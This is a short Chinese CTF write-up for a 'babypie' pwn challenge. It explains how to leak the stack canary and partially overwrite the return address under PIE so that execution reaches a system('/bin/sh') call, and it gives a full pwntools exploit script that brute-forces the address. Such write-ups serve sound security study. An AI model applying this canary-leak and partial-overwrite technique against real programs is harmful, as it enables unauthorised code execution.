明显的是缓冲区溢出呀,read函数可以多读
64位程序,开启了NX和PIE,且程序里有了system("/bin/sh")
目标:控制RIP到A3E函数即可~
首先,要处理canary的问题~然后,覆盖返回地址~
partial overwrite:在开启了PIE后,无论高位地址如何变化,低位地址是不变的,意味着有概率“撞到”正确的地址
exp如下:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
while True:
try:
io = process("./babypie", timeout = 1)
io.sendafter(":\n", "A" * (0x30 - 0x8 + 1))
io.recvuntil("A" * (0x30 - 0x8 + 1))
canary = '\0' + io.recvn(7)
success("0x" + canary.encode("hex"))
io.sendafter(":\n", "A" * (0x30 - 0x8) + canary + "B" * 8 + '\x3E\x0A')
io.interactive()
except Exception as e:
io.close()
print e
参考链接:
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#partial-overwrite